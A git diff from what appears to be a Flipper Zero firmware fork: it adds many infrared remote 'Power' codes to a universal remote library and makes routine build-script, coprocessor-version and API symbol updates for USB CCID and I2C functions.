1331 410 1331 410 460 410 1331 410 1331 410 1331 410 1331 410 74392 3515 1736 437 433 437 1304 437 433 437 433 437 434 436 433 437 434 436 433 437 434 436 434 436 434 436 434 436 434 436 1305 436 434 436 434 436 434 436 434 436 434 436 434 436 434 436 434 436 434 436 1305 436 434 436 435 436 434 436 1306 435 435 435 435 435 1306 435 435 435 435 435 435 435 435 435 435 435 436 434 436 434 435 435 436 434 435 435 1306 435 1330 411 1307 434 1331 410 1308 433 436 434 436 434 460 410 1331 410 1331 410 460 410 1331 410 1331 410 1331 410 1331 410 74392 3515 1736 437 433 437 1304 437 434 436 433 437 434 436 433 437 434 436 434 436 434 436 434 436 434 436 434 436 434 436 1305 436 434 436 434 436 434 436 435 435 434 436 434 436 434 436 434 436 434 436 1306 435 435 435 435 435 435 435 1306 435 435 435 436 434 1306 435 435 435 436 434 436 434 435 435 436 434 436 434 460 410 460 410 460 410 460 410 1331 410 1331 410 1331 410 1331 410 1331 410 460 410 460 410 460 410 1331 410 1331 410 460 410 1331 410 1331 410 1331 410 1331 410 74392 3515 1736 437 433 437 1304 437 433 437 434 436 434 436 433 437 434 436 434 436 434 436 434 436 434 436 434 436 434 436 1305 436 434 436 434 436 434 436 434 436 434 436 434 436 435 435 435 435 434 436 1306 435 434 436 435 435 435 435 1306 435 436 434 435 435 1306 435 435 435 436 434 436 434 436 434 436 434 460 410 437 433 459 411 460 410 460 410 1331 410 1331 410 1331 410 1331 410 1331 410 460 410 460 410 460 410 1331 410 1331 410 460 410 1331 410 1331 410 1331 410 1331 410 74393 3514 1736 437 434 436 1304 437 433 437 434 436 433 437 434 436 433 437 434 436 434 436 434 436 434 436 434 436 434 436 1305 436 434 436 434 436 434 436 434 436 435 435 434 436 434 436 435 435 434 436 1305 436 435 435 435 435 435 435 1306 435 435 435 435 435 1306 435 435 435 436 434 435 435 459 411 436 434 435 435 459 411 459 411 459 411 459 411 1330 411 1306 435 1330 411 1330 411 1331 410 460 410 460 410 460 410 1331 410 1331 410 460 410 1331 410 1331 410 1331 410 1331 410 # name: Vol_up type: raw @@ -208,6 +252,18 @@ type: parsed protocol: NECext address: 83 F4 00 00 command: 4F B0 00 00 +# ON +name: Power +type: parsed +protocol: NECext +address: 83 F4 00 00 +command: 4F B0 00 00 +# +name: Power +type: parsed +protocol: NECext +address: 80 19 00 00 +command: 10 EF 00 00 # name: Power type: parsed @@ -235,6 +291,12 @@ command: 51 00 00 00 # name: Power type: parsed +protocol: NEC +address: 80 00 00 00 +command: 51 00 00 00 +# +name: Power +type: parsed protocol: NECext address: 40 40 00 00 command: 0A F5 00 00 @@ -242,6 +304,18 @@ command: 0A F5 00 00 name: Power type: parsed protocol: NECext +address: 40 40 00 00 +command: 0A F5 00 00 +# +name: Power +type: parsed +protocol: NECext +address: 00 30 00 00 +command: 4E B1 00 00 +# +name: Power +type: parsed +protocol: NECext address: 00 30 00 00 command: 4E B1 00 00 # @@ -263,6 +337,12 @@ protocol: NECext address: 00 30 00 00 command: 4F B0 00 00 # +name: Power +type: parsed +protocol: NECext +address: 00 30 00 00 +command: 4F B0 00 00 +# name: Mute type: parsed protocol: NECext @@ -275,6 +355,12 @@ protocol: NECext address: 08 16 00 00 command: 87 78 00 00 # +name: Power +type: parsed +protocol: NECext +address: 08 16 00 00 +command: 87 78 00 00 +# name: Mute type: parsed protocol: NECext @@ -287,6 +373,12 @@ protocol: NEC address: 01 00 00 00 command: 01 00 00 00 # +name: Power +type: parsed +protocol: NEC +address: 01 00 00 00 +command: 01 00 00 00 +# name: Mute type: parsed protocol: NEC @@ -314,6 +406,18 @@ command: 0B F4 00 00 name: Power type: parsed protocol: NECext +address: 84 F4 00 00 +command: 0B F4 00 00 +# +name: Power +type: parsed +protocol: NECext +address: 33 00 00 00 +command: 00 FF 00 00 +# +name: Power +type: parsed +protocol: NECext address: 33 00 00 00 command: 00 FF 00 00 # @@ -341,6 +445,12 @@ protocol: NECext address: 83 55 00 00 command: 90 6F 00 00 # +name: Power +type: parsed +protocol: NECext +address: 83 55 00 00 +command: 90 6F 00 00 +# name: Vol_dn type: parsed protocol: NECext @@ -359,6 +469,12 @@ protocol: NECext address: 00 DF 00 00 command: 1C E3 00 00 # +name: Power +type: parsed +protocol: NECext +address: 00 DF 00 00 +command: 1C E3 00 00 +# name: Vol_dn type: parsed protocol: NECext @@ -381,6 +497,18 @@ name: Power type: parsed protocol: NEC address: 32 00 00 00 +command: 02 00 00 00 +# +name: Power +type: parsed +protocol: NEC +address: 32 00 00 00 +command: 2E 00 00 00 +# +name: Power +type: parsed +protocol: NEC +address: 32 00 00 00 command: 2E 00 00 00 # name: Mute @@ -395,6 +523,12 @@ protocol: NEC address: 20 00 00 00 command: 41 00 00 00 # +name: Power +type: parsed +protocol: NEC +address: 20 00 00 00 +command: 41 00 00 00 +# name: Vol_up type: parsed protocol: NEC @@ -419,6 +553,12 @@ protocol: SIRC15 address: 54 00 00 00 command: 15 00 00 00 # +name: Power +type: parsed +protocol: SIRC15 +address: 54 00 00 00 +command: 15 00 00 00 +# name: Vol_up type: parsed protocol: NECext @@ -447,6 +587,18 @@ name: Power type: parsed protocol: NEC address: 31 00 00 00 +command: 91 00 00 00 +# +name: Power +type: parsed +protocol: NEC +address: 31 00 00 00 +command: 90 00 00 00 +# +name: Power +type: parsed +protocol: NEC +address: 31 00 00 00 command: 90 00 00 00 # name: Vol_up @@ -467,6 +619,12 @@ protocol: NECext address: 86 00 00 00 command: 00 00 00 00 # +name: Power +type: parsed +protocol: NECext +address: 86 00 00 00 +command: 00 00 00 00 +# name: Vol_up type: parsed protocol: NECext @@ -494,10 +652,28 @@ command: 00 00 00 00 name: Power type: parsed protocol: NECext +address: 30 00 00 00 +command: 00 00 00 00 +# +name: Power +type: parsed +protocol: NECext address: 87 4E 00 00 command: 0D 00 00 00 # name: Power +type: parsed +protocol: NECext +address: 87 4E 00 00 +command: 0D 00 00 00 +# +name: Power +type: raw +frequency: 38000 +duty_cycle: 0.330000 +data: 9032 4479 597 560 572 558 564 566 566 1666 589 1671 594 562 570 560 562 568 564 1669 596 560 562 568 564 1669 596 560 562 1671 594 1666 588 1671 594 562 570 560 562 568 564 1669 596 560 562 568 564 566 566 563 569 1664 591 1669 596 1664 590 565 567 1667 598 1661 593 1666 588 1671 594 562 570 560 562 568 564 565 567 563 569 560 562 568 564 565 567 1666 588 1671 594 1665 589 1670 595 1665 590 1669 596 1664 590 1668 597 13983 9029 2222 599 96237 9030 2221 589 96244 9034 2217 594 96244 9033 2218 592 96249 9038 2213 597 96239 9037 2214 596 96238 9028 2223 598 96221 9032 2215 595 +# +name: Power type: raw frequency: 38000 duty_cycle: 0.330000 @@ -538,6 +714,18 @@ type: parsed protocol: NECext address: 83 F4 00 00 command: 4E B1 00 00 +# OFF +name: Power +type: parsed +protocol: NECext +address: 83 F4 00 00 +command: 4E B1 00 00 +# +name: Power +type: parsed +protocol: NEC +address: 03 00 00 00 +command: 1D 00 00 00 # name: Power type: parsed @@ -562,6 +750,18 @@ type: raw frequency: 38000 duty_cycle: 0.330000 data: 9075 4307 677 433 675 456 651 461 651 1579 650 1576 649 459 649 460 648 465 648 1578 647 461 622 491 622 1604 647 465 647 1583 622 1608 647 1579 647 461 647 466 622 1604 647 465 647 1579 647 461 645 463 648 465 648 1583 646 1580 646 466 647 1579 622 491 647 1583 622 1608 647 1579 647 461 647 461 622 486 622 486 647 461 647 462 646 462 622 491 646 1584 622 1608 647 1584 621 1608 647 1583 646 1584 647 1584 646 1592 622 14330 9047 2137 621 +# OFF +name: Power +type: raw +frequency: 38000 +duty_cycle: 0.330000 +data: 9075 4307 677 433 675 456 651 461 651 1579 650 1576 649 459 649 460 648 465 648 1578 647 461 622 491 622 1604 647 465 647 1583 622 1608 647 1579 647 461 647 466 622 1604 647 465 647 1579 647 461 645 463 648 465 648 1583 646 1580 646 466 647 1579 622 491 647 1583 622 1608 647 1579 647 461 647 461 622 486 622 486 647 461 647 462 646 462 622 491 646 1584 622 1608 647 1584 621 1608 647 1583 646 1584 647 1584 646 1592 622 14330 9047 2137 621 +# +name: Power +type: parsed +protocol: Samsung32 +address: 07 00 00 00 +command: E6 00 00 00 # name: Power type: parsed @@ -597,12 +797,30 @@ name: Power type: raw frequency: 38000 duty_cycle: 0.330000 +data: 3523 1701 472 426 444 1269 472 426 444 426 442 429 443 427 443 426 444 426 444 426 443 427 442 429 440 430 439 432 438 1304 437 433 437 432 438 432 438 433 437 433 437 433 437 433 437 433 437 433 437 1304 437 433 437 433 437 433 437 1304 437 433 437 433 437 1304 437 433 437 434 436 433 437 434 436 434 436 434 436 433 437 433 437 434 436 1304 437 1305 436 1305 436 1305 436 1305 436 1305 436 434 436 434 436 1305 436 1305 436 1305 436 434 436 1305 436 1305 436 1306 435 1306 435 74393 3515 1736 437 433 437 1304 437 433 437 433 437 433 437 433 437 433 437 433 437 433 437 434 436 433 437 434 436 434 436 1304 437 434 436 434 436 434 436 434 436 434 436 434 436 434 436 434 436 434 436 1305 436 434 436 434 436 434 436 1305 436 434 436 434 436 1306 435 435 435 435 435 435 435 435 435 435 435 435 435 435 435 436 434 435 435 1307 434 1331 410 1307 434 1307 434 1330 411 1307 434 460 410 460 410 1331 410 1331 410 1331 410 460 410 1331 410 1331 410 1331 410 1331 410 74393 3515 1736 437 433 437 1304 437 433 437 433 437 433 437 433 437 433 437 433 437 433 437 434 436 434 436 433 437 433 437 1304 437 434 436 434 436 434 437 434 436 434 436 434 436 434 436 434 436 434 436 1305 436 434 436 434 436 434 436 1305 436 435 435 434 436 1305 436 434 436 435 435 435 435 435 435 435 435 435 435 435 435 435 435 435 435 1307 434 1306 435 1307 434 1307 434 1307 434 1331 410 460 410 460 410 1331 410 1331 410 1331 410 460 410 1331 410 1331 410 1331 410 1331 410 74393 3515 1736 437 433 437 1304 437 433 437 433 437 433 437 433 437 433 437 433 437 433 437 433 437 433 437 434 436 433 437 1304 437 433 437 434 436 434 436 434 436 434 436 434 436 434 436 434 436 434 437 1305 436 434 436 434 436 434 436 1305 436 434 436 434 436 1306 435 435 435 435 435 435 435 435 435 435 435 435 435 435 435 435 435 435 435 1307 434 1330 411 1330 411 1330 411 1330 411 1330 411 460 410 460 410 1331 410 1331 410 1331 410 460 410 1331 410 1331 410 1331 410 1331 410 +# OFF +name: Power +type: raw +frequency: 38000 +duty_cycle: 0.330000 data: 9093 4441 620 507 618 530 594 531 593 1652 595 1653 620 505 620 505 619 506 617 1630 616 508 616 508 616 1632 615 509 615 1631 616 1632 615 1632 615 510 615 509 615 1632 615 509 615 1632 615 510 615 510 614 509 615 1632 614 1633 614 509 615 1633 614 509 615 1632 615 1632 614 1633 614 510 614 510 615 510 615 510 614 510 614 510 615 510 615 510 614 1632 615 1632 614 1632 615 1632 615 1632 615 1632 615 1632 615 1633 614 14439 9088 2192 614 96349 9112 2190 616 # OFF name: Power type: raw frequency: 38000 duty_cycle: 0.330000 +data: 9093 4441 620 507 618 530 594 531 593 1652 595 1653 620 505 620 505 619 506 617 1630 616 508 616 508 616 1632 615 509 615 1631 616 1632 615 1632 615 510 615 509 615 1632 615 509 615 1632 615 510 615 510 614 509 615 1632 614 1633 614 509 615 1633 614 509 615 1632 615 1632 614 1633 614 510 614 510 615 510 615 510 614 510 614 510 615 510 615 510 614 1632 615 1632 614 1632 615 1632 615 1632 615 1632 615 1632 615 1633 614 14439 9088 2192 614 96349 9112 2190 616 +# OFF +name: Power +type: raw +frequency: 38000 +duty_cycle: 0.330000 +data: 243 27700 170 27632 246 27694 282 27595 307 27497 241 27696 177 27710 164 27644 245 27629 246 27712 174 27638 211 27736 131 27741 306 27504 214 27727 135 27749 132 27761 126 27744 131 27753 127 27764 121 27767 132 27773 307 27577 131 27706 213 27761 129 27759 128 27770 125 27694 213 27751 307 27578 131 27737 131 27745 304 27575 335 27540 124 27752 132 27749 132 27747 134 27757 134 27758 127 27762 131 27748 131 27750 122 27749 130 27748 125 27772 131 27774 136 27762 135 27686 215 27742 131 27749 132 27756 133 27764 126 24073 9255 4460 672 488 618 541 619 541 619 1675 619 1676 618 542 618 542 618 542 618 1676 618 542 618 543 617 1678 616 568 592 1702 592 1702 592 1703 617 543 617 543 617 1677 617 543 617 1678 615 544 616 544 616 544 616 1678 616 1679 615 544 616 1679 615 545 615 1679 615 1679 615 1679 615 40240 9173 2273 591 +# OFF +name: Power +type: raw +frequency: 38000 +duty_cycle: 0.330000 data: 243 27700 170 27632 246 27694 282 27595 307 27497 241 27696 177 27710 164 27644 245 27629 246 27712 174 27638 211 27736 131 27741 306 27504 214 27727 135 27749 132 27761 126 27744 131 27753 127 27764 121 27767 132 27773 307 27577 131 27706 213 27761 129 27759 128 27770 125 27694 213 27751 307 27578 131 27737 131 27745 304 27575 335 27540 124 27752 132 27749 132 27747 134 27757 134 27758 127 27762 131 27748 131 27750 122 27749 130 27748 125 27772 131 27774 136 27762 135 27686 215 27742 131 27749 132 27756 133 27764 126 24073 9255 4460 672 488 618 541 619 541 619 1675 619 1676 618 542 618 542 618 542 618 1676 618 542 618 543 617 1678 616 568 592 1702 592 1702 592 1703 617 543 617 543 617 1677 617 543 617 1678 615 544 616 544 616 544 616 1678 616 1679 615 544 616 1679 615 545 615 1679 615 1679 615 1679 615 40240 9173 2273 591 # name: Vol_up @@ -622,6 +840,12 @@ type: parsed protocol: NEC address: 02 00 00 00 command: 14 00 00 00 +# +name: Power +type: parsed +protocol: NEC +address: 02 00 00 00 +command: 14 00 00 00 # name: Vol_up type: parsed @@ -647,6 +871,12 @@ protocol: NECext address: B8 57 00 00 command: 0C F3 00 00 # +name: Power +type: parsed +protocol: NECext +address: B8 57 00 00 +command: 0C F3 00 00 +# name: Mute type: parsed protocol: NECext @@ -671,6 +901,12 @@ protocol: NEC address: 32 00 00 00 command: 81 00 00 00 # +name: Power +type: parsed +protocol: NEC +address: 32 00 00 00 +command: 81 00 00 00 +# name: Vol_dn type: parsed protocol: NEC @@ -694,6 +930,12 @@ type: parsed protocol: NEC address: 00 00 00 00 command: A8 00 00 00 +# +name: Power +type: parsed +protocol: NEC +address: 00 00 00 00 +command: A8 00 00 00 # name: Mute type: parsed @@ -718,6 +960,12 @@ type: parsed protocol: NECext address: 87 45 00 00 command: 17 E8 00 00 +# +name: Power +type: parsed +protocol: NECext +address: 87 45 00 00 +command: 17 E8 00 00 # name: Vol_up type: raw @@ -742,6 +990,12 @@ type: parsed protocol: NECext address: FF FF 00 00 command: E8 17 00 00 +# +name: Power +type: parsed +protocol: NECext +address: FF FF 00 00 +command: E8 17 00 00 # name: Vol_up type: parsed @@ -760,6 +1014,12 @@ type: parsed protocol: Kaseikyo address: 41 54 32 00 command: 05 00 00 00 +# +name: Power +type: parsed +protocol: Kaseikyo +address: 41 54 32 00 +command: 05 00 00 00 # name: Vol_up type: parsed @@ -781,6 +1041,18 @@ command: 81 00 00 00 # name: Power type: parsed +protocol: NEC +address: 31 00 00 00 +command: 81 00 00 00 +# +name: Power +type: parsed +protocol: NECext +address: 83 F4 00 00 +command: 17 E8 00 00 +# +name: Power +type: parsed protocol: NECext address: 83 F4 00 00 command: 17 E8 00 00 @@ -808,6 +1080,12 @@ type: parsed protocol: NECext address: 4F 50 00 00 command: 02 FD 00 00 +# +name: Power +type: parsed +protocol: NECext +address: 4F 50 00 00 +command: 02 FD 00 00 # name: Vol_up type: parsed @@ -845,6 +1123,12 @@ frequency: 38000 duty_cycle: 0.330000 data: 8811 4222 530 1580 531 1579 531 507 531 507 531 507 531 508 531 508 530 1582 528 1583 527 535 503 1608 502 536 501 1609 501 537 501 1610 500 538 500 1611 499 538 500 539 500 538 500 1611 500 539 499 538 500 1611 499 539 499 1611 499 1611 500 1611 499 539 499 1611 500 1611 500 539 499 35437 8784 4252 500 1611 500 1612 500 539 500 539 500 539 500 539 500 539 500 1611 500 1612 499 539 500 1612 500 539 500 1612 499 539 500 1612 500 539 500 1612 499 539 500 539 500 539 499 1612 499 540 499 539 500 1612 499 539 500 1612 499 1613 499 1612 499 539 500 1612 500 1612 500 539 500 # +name: Power +type: raw +frequency: 38000 +duty_cycle: 0.330000 +data: 8811 4222 530 1580 531 1579 531 507 531 507 531 507 531 508 531 508 530 1582 528 1583 527 535 503 1608 502 536 501 1609 501 537 501 1610 500 538 500 1611 499 538 500 539 500 538 500 1611 500 539 499 538 500 1611 499 539 499 1611 499 1611 500 1611 499 539 499 1611 500 1611 500 539 499 35437 8784 4252 500 1611 500 1612 500 539 500 539 500 539 500 539 500 539 500 1611 500 1612 499 539 500 1612 500 539 500 1612 499 539 500 1612 500 539 500 1612 499 539 500 539 500 539 499 1612 499 540 499 539 500 1612 499 539 500 1612 499 1613 499 1612 499 539 500 1612 500 1612 500 539 500 +# name: Vol_up type: parsed protocol: NEC @@ -868,6 +1152,12 @@ type: parsed protocol: NEC address: 01 00 00 00 command: 00 00 00 00 +# +name: Power +type: parsed +protocol: NEC +address: 01 00 00 00 +command: 00 00 00 00 # name: Mute type: raw @@ -899,6 +1189,12 @@ protocol: NEC address: 02 00 00 00 command: 12 00 00 00 # +name: Power +type: parsed +protocol: NEC +address: 02 00 00 00 +command: 12 00 00 00 +# name: Vol_dn type: parsed protocol: NEC @@ -917,6 +1213,12 @@ protocol: NECext address: 04 B1 00 00 command: 58 A7 00 00 # +name: Power +type: parsed +protocol: NECext +address: 04 B1 00 00 +command: 58 A7 00 00 +# name: Mute type: raw frequency: 38000 @@ -929,6 +1231,12 @@ protocol: NECext address: 8B CA 00 00 command: 12 ED 00 00 # +name: Power +type: parsed +protocol: NECext +address: 8B CA 00 00 +command: 12 ED 00 00 +# name: Vol_up type: parsed protocol: NECext @@ -961,6 +1269,18 @@ command: 40 00 00 00 # name: Power type: parsed +protocol: NEC +address: 01 00 00 00 +command: 40 00 00 00 +# +name: Power +type: parsed +protocol: NECext +address: 00 BD 00 00 +command: 01 FE 00 00 +# +name: Power +type: parsed protocol: NECext address: 00 BD 00 00 command: 01 FE 00 00 @@ -1097,6 +1417,12 @@ protocol: NECext address: 87 4E 00 00 command: 17 E8 00 00 # +name: Power +type: parsed +protocol: NECext +address: 87 4E 00 00 +command: 17 E8 00 00 +# name: Vol_up type: parsed protocol: NECext @@ -1115,6 +1441,12 @@ frequency: 38000 duty_cycle: 0.33 data: 293 1801 296 753 295 1801 296 1801 296 752 296 754 294 1801 296 1800 297 752 296 1802 295 752 296 1801 296 753 295 1800 297 752 296 42709 296 1800 297 753 295 1800 297 1800 297 753 295 1802 295 753 295 753 295 1801 296 753 295 1801 296 754 294 1802 295 753 295 1801 296 42694 295 1800 297 752 296 1803 294 1803 294 753 295 753 295 1801 296 1802 295 752 296 1802 295 752 296 1801 296 753 295 1802 295 753 295 42709 295 1802 295 753 295 1803 294 1801 296 753 295 1802 295 752 296 752 296 1801 296 752 296 1803 294 754 294 1803 294 754 294 1804 293 42694 294 1802 294 755 293 1803 294 1804 268 779 269 779 269 1828 269 1828 269 780 268 1829 268 778 270 1829 323 725 268 1829 268 781 324 # +name: Power +type: raw +frequency: 38000 +duty_cycle: 0.33 +data: 293 1801 296 753 295 1801 296 1801 296 752 296 754 294 1801 296 1800 297 752 296 1802 295 752 296 1801 296 753 295 1800 297 752 296 42709 296 1800 297 753 295 1800 297 1800 297 753 295 1802 295 753 295 753 295 1801 296 753 295 1801 296 754 294 1802 295 753 295 1801 296 42694 295 1800 297 752 296 1803 294 1803 294 753 295 753 295 1801 296 1802 295 752 296 1802 295 752 296 1801 296 753 295 1802 295 753 295 42709 295 1802 295 753 295 1803 294 1801 296 753 295 1802 295 752 296 752 296 1801 296 752 296 1803 294 754 294 1803 294 754 294 1804 293 42694 294 1802 294 755 293 1803 294 1804 268 779 269 779 269 1828 269 1828 269 780 268 1829 268 778 270 1829 323 725 268 1829 268 781 324 +# name: Mute type: raw frequency: 38000 diff --git a/assets/resources/infrared/assets/tv.ir b/assets/resources/infrared/assets/tv.ir index 1b4eab6e8..6142663b8 100755 --- a/assets/resources/infrared/assets/tv.ir +++ b/assets/resources/infrared/assets/tv.ir @@ -1,7 +1,7 @@ Filetype: IR library file Version: 1 # Last Updated 1st Sept, 2023 -# Last Checked 1st Sept, 2023 +# Last Checked 14th Sept, 2023 # name: Power type: parsed diff --git a/fbt b/fbt index 471285a76..26f325d45 100755 --- a/fbt +++ b/fbt @@ -25,7 +25,7 @@ if [ -z "$FBT_VERBOSE" ]; then fi if [ -z "$FBT_NO_SYNC" ]; then - if [ ! -d "$SCRIPT_PATH/.git" ]; then + if [ ! -e "$SCRIPT_PATH/.git" ]; then echo "\".git\" directory not found, please clone repo via \"git clone\""; exit 1; fi diff --git a/fbt_options.py b/fbt_options.py index 18b636822..3f44bec3b 100644 --- a/fbt_options.py +++ b/fbt_options.py @@ -25,7 +25,7 @@ DIST_SUFFIX = f"XFW-DEV_@{subprocess.check_output(['git', 'rev-parse', '--short= COPRO_OB_DATA = "scripts/ob.data" # Must match lib/stm32wb_copro version -COPRO_CUBE_VERSION = "1.15.0" +COPRO_CUBE_VERSION = "1.17.2" COPRO_CUBE_DIR = "lib/stm32wb_copro" diff --git a/firmware.scons b/firmware.scons index 657822700..82f775d71 100644 --- a/firmware.scons +++ b/firmware.scons @@ -143,7 +143,7 @@ fwenv.PrepareApplicationsBuild() # Build external apps + configure SDK if env["IS_BASE_FIRMWARE"]: - fwenv.SetDefault(FBT_FAP_DEBUG_ELF_ROOT="${BUILD_DIR}/.extapps") + fwenv.SetDefault(FBT_FAP_DEBUG_ELF_ROOT=fwenv["BUILD_DIR"].Dir(".extapps")) fwenv["FW_EXTAPPS"] = SConscript( "site_scons/extapps.scons", exports={"ENV": fwenv}, diff --git a/firmware/targets/f18/api_symbols.csv b/firmware/targets/f18/api_symbols.csv index 0c2064931..338697ad7 100644 --- a/firmware/targets/f18/api_symbols.csv +++ b/firmware/targets/f18/api_symbols.csv @@ -1,5 +1,5 @@ entry,status,name,type,params -Version,+,38.0,, +Version,+,39.1,, Header,+,applications/services/bt/bt_service/bt.h,, Header,+,applications/services/cli/cli.h,, Header,+,applications/services/cli/cli_vcp.h,, @@ -76,6 +76,7 @@ Header,+,firmware/targets/furi_hal_include/furi_hal_sd.h,, Header,+,firmware/targets/furi_hal_include/furi_hal_speaker.h,, Header,+,firmware/targets/furi_hal_include/furi_hal_spi.h,, Header,+,firmware/targets/furi_hal_include/furi_hal_usb.h,, +Header,+,firmware/targets/furi_hal_include/furi_hal_usb_ccid.h,, Header,+,firmware/targets/furi_hal_include/furi_hal_usb_hid.h,, Header,+,firmware/targets/furi_hal_include/furi_hal_usb_hid_u2f.h,, Header,+,firmware/targets/furi_hal_include/furi_hal_version.h,, @@ -105,6 +106,7 @@ Header,+,lib/libusb_stm32/inc/hid_usage_telephony.h,, Header,+,lib/libusb_stm32/inc/hid_usage_vr.h,, Header,-,lib/libusb_stm32/inc/stm32_compat.h,, Header,+,lib/libusb_stm32/inc/usb.h,, +Header,+,lib/libusb_stm32/inc/usb_ccid.h,, Header,+,lib/libusb_stm32/inc/usb_cdc.h,, Header,+,lib/libusb_stm32/inc/usb_cdca.h,, Header,+,lib/libusb_stm32/inc/usb_cdce.h,, @@ -1008,6 +1010,9 @@ Function,+,furi_hal_bus_enable,void,FuriHalBus Function,+,furi_hal_bus_init_early,void, Function,+,furi_hal_bus_is_enabled,_Bool,FuriHalBus Function,+,furi_hal_bus_reset,void,FuriHalBus +Function,+,furi_hal_ccid_ccid_insert_smartcard,void, +Function,+,furi_hal_ccid_ccid_remove_smartcard,void, +Function,+,furi_hal_ccid_set_callbacks,void,CcidCallbacks* Function,+,furi_hal_cdc_get_ctrl_line_state,uint8_t,uint8_t Function,+,furi_hal_cdc_get_port_settings,usb_cdc_line_coding*,uint8_t Function,+,furi_hal_cdc_receive,int32_t,"uint8_t, uint8_t*, uint16_t" @@ -1020,8 +1025,10 @@ Function,+,furi_hal_clock_mco_disable,void, Function,+,furi_hal_clock_mco_enable,void,"FuriHalClockMcoSourceId, FuriHalClockMcoDivisorId" Function,-,furi_hal_clock_resume_tick,void, Function,-,furi_hal_clock_suspend_tick,void, -Function,-,furi_hal_clock_switch_to_hsi,void, -Function,-,furi_hal_clock_switch_to_pll,void, +Function,-,furi_hal_clock_switch_hse2hsi,void, +Function,-,furi_hal_clock_switch_hse2pll,_Bool, +Function,-,furi_hal_clock_switch_hsi2hse,void, +Function,-,furi_hal_clock_switch_pll2hse,_Bool, Function,+,furi_hal_console_disable,void, Function,+,furi_hal_console_enable,void, Function,+,furi_hal_console_init,void, @@ -1103,14 +1110,16 @@ Function,-,furi_hal_i2c_deinit_early,void, Function,-,furi_hal_i2c_init,void, Function,-,furi_hal_i2c_init_early,void, Function,+,furi_hal_i2c_is_device_ready,_Bool,"FuriHalI2cBusHandle*, uint8_t, uint32_t" -Function,+,furi_hal_i2c_read_mem,_Bool,"FuriHalI2cBusHandle*, uint8_t, uint8_t, uint8_t*, uint8_t, uint32_t" +Function,+,furi_hal_i2c_read_mem,_Bool,"FuriHalI2cBusHandle*, uint8_t, uint8_t, uint8_t*, size_t, uint32_t" Function,+,furi_hal_i2c_read_reg_16,_Bool,"FuriHalI2cBusHandle*, uint8_t, uint8_t, uint16_t*, uint32_t" Function,+,furi_hal_i2c_read_reg_8,_Bool,"FuriHalI2cBusHandle*, uint8_t, uint8_t, uint8_t*, uint32_t" Function,+,furi_hal_i2c_release,void,FuriHalI2cBusHandle* -Function,+,furi_hal_i2c_rx,_Bool,"FuriHalI2cBusHandle*, const uint8_t, uint8_t*, const uint8_t, uint32_t" -Function,+,furi_hal_i2c_trx,_Bool,"FuriHalI2cBusHandle*, const uint8_t, const uint8_t*, const uint8_t, uint8_t*, const uint8_t, uint32_t" -Function,+,furi_hal_i2c_tx,_Bool,"FuriHalI2cBusHandle*, const uint8_t, const uint8_t*, const uint8_t, uint32_t" -Function,+,furi_hal_i2c_write_mem,_Bool,"FuriHalI2cBusHandle*, uint8_t, uint8_t, uint8_t*, uint8_t, uint32_t" +Function,+,furi_hal_i2c_rx,_Bool,"FuriHalI2cBusHandle*, uint8_t, uint8_t*, size_t, uint32_t" +Function,+,furi_hal_i2c_rx_ext,_Bool,"FuriHalI2cBusHandle*, uint16_t, _Bool, uint8_t*, size_t, FuriHalI2cBegin, FuriHalI2cEnd, uint32_t" +Function,+,furi_hal_i2c_trx,_Bool,"FuriHalI2cBusHandle*, uint8_t, const uint8_t*, size_t, uint8_t*, size_t, uint32_t" +Function,+,furi_hal_i2c_tx,_Bool,"FuriHalI2cBusHandle*, uint8_t, const uint8_t*, size_t, uint32_t" +Function,+,furi_hal_i2c_tx_ext,_Bool,"FuriHalI2cBusHandle*, uint16_t, _Bool, const uint8_t*, size_t, FuriHalI2cBegin, FuriHalI2cEnd, uint32_t" +Function,+,furi_hal_i2c_write_mem,_Bool,"FuriHalI2cBusHandle*, uint8_t, uint8_t, const uint8_t*, size_t, uint32_t" Function,+,furi_hal_i2c_write_reg_16,_Bool,"FuriHalI2cBusHandle*, uint8_t, uint8_t, uint16_t, uint32_t" Function,+,furi_hal_i2c_write_reg_8,_Bool,"FuriHalI2cBusHandle*, uint8_t, uint8_t, uint8_t, uint32_t" Function,+,furi_hal_info_get,void,"PropertyValueCallback, char, void*" @@ -2688,6 +2697,7 @@ Variable,+,sequence_single_vibro,const NotificationSequence, Variable,+,sequence_solid_yellow,const NotificationSequence, Variable,+,sequence_success,const NotificationSequence, Variable,-,suboptarg,char*, +Variable,+,usb_ccid,FuriHalUsbInterface, Variable,+,usb_cdc_dual,FuriHalUsbInterface, Variable,+,usb_cdc_single,FuriHalUsbInterface, Variable,+,usb_hid,FuriHalUsbInterface, diff --git a/firmware/targets/f7/api_symbols.csv b/firmware/targets/f7/api_symbols.csv index 96c159908..c342671b5 100644 --- a/firmware/targets/f7/api_symbols.csv +++ b/firmware/targets/f7/api_symbols.csv @@ -1,5 +1,5 @@ entry,status,name,type,params -Version,+,38.0,, +Version,+,39.1,, Header,+,applications/drivers/subghz/cc1101_ext/cc1101_ext_interconnect.h,, Header,+,applications/main/archive/helpers/archive_helpers_ext.h,, Header,+,applications/services/applications.h,, @@ -86,6 +86,7 @@ Header,+,firmware/targets/furi_hal_include/furi_hal_sd.h,, Header,+,firmware/targets/furi_hal_include/furi_hal_speaker.h,, Header,+,firmware/targets/furi_hal_include/furi_hal_spi.h,, Header,+,firmware/targets/furi_hal_include/furi_hal_usb.h,, +Header,+,firmware/targets/furi_hal_include/furi_hal_usb_ccid.h,, Header,+,firmware/targets/furi_hal_include/furi_hal_usb_hid.h,, Header,+,firmware/targets/furi_hal_include/furi_hal_usb_hid_u2f.h,, Header,+,firmware/targets/furi_hal_include/furi_hal_version.h,, @@ -128,6 +129,7 @@ Header,+,lib/libusb_stm32/inc/hid_usage_telephony.h,, Header,+,lib/libusb_stm32/inc/hid_usage_vr.h,, Header,-,lib/libusb_stm32/inc/stm32_compat.h,, Header,+,lib/libusb_stm32/inc/usb.h,, +Header,+,lib/libusb_stm32/inc/usb_ccid.h,, Header,+,lib/libusb_stm32/inc/usb_cdc.h,, Header,+,lib/libusb_stm32/inc/usb_cdca.h,, Header,+,lib/libusb_stm32/inc/usb_cdce.h,, @@ -1145,6 +1147,9 @@ Function,+,furi_hal_bus_enable,void,FuriHalBus Function,+,furi_hal_bus_init_early,void, Function,+,furi_hal_bus_is_enabled,_Bool,FuriHalBus Function,+,furi_hal_bus_reset,void,FuriHalBus +Function,+,furi_hal_ccid_ccid_insert_smartcard,void, +Function,+,furi_hal_ccid_ccid_remove_smartcard,void, +Function,+,furi_hal_ccid_set_callbacks,void,CcidCallbacks* Function,+,furi_hal_cdc_get_ctrl_line_state,uint8_t,uint8_t 